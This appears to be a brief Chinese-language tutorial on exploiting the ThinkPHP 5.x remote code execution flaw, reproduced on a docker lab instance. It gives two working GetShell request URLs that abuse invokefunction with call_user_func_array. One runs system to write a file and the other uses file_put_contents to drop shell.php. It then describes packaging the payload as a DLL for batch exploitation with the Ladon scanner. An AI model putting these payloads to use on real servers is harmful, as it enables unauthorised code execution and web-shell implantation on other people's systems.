前言
使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell
漏洞环境
使用docker ThinkPHP 5.0.20
复现测试
执行命令
写入文件
GetShell1
http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php
GetShell2
/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容
视频教程
通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程
Video: K8Cscan ThinkPHP 5.x RCE Exploit